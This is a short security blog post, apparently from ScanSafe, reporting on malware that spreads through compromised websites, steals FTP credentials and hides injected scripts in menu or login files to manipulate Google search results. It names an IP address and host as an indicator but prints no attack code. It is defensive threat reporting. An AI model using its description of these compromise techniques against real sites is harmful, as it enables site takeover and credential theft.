Malware Manipulating Google SERPs
Over the past few months, ScanSafe has been tracking malware that incorporates a couple of crafty Black Hat SEO techniques to manipulate Google SERPs. Because of the nature of how the attacks work, the rate of the attacks have been increasing exponentially and have now grown considerably large.
The attacks are perpetuated through compromise of legitimate sites. Once a visitor to a compromised site has been infected with the trojan, any sites that they manage will then also be susceptible to compromise. (One component of the malware is its ability to monitor traffic and steal FTP credentials). Though stolen FTP credentials appear to be the most common method employed in these particular attacks, compromise can also occur via standard methods, such as poor configuration settings, vulnerable Web apps, and so on.
The malicious script embedded during the compromise is usually placed on other .js or .php file rather than directly on the default home page for the site. For example, menu files, login pages, and similar types of content feeds are generally targed. This technique could enable the signs of the compromise to bypass casual observation.
This leads to 94.247.2.195 which resolves to hs.2-195.zlkon.lv, hosted by Datoru Express Serviss, Latvia. Of course, physical host location and whois information may bear little resemblance to the actual attackers.
http://blog.scansafe.com/journal/2009/4/14/malware-manipulating-google-serps.html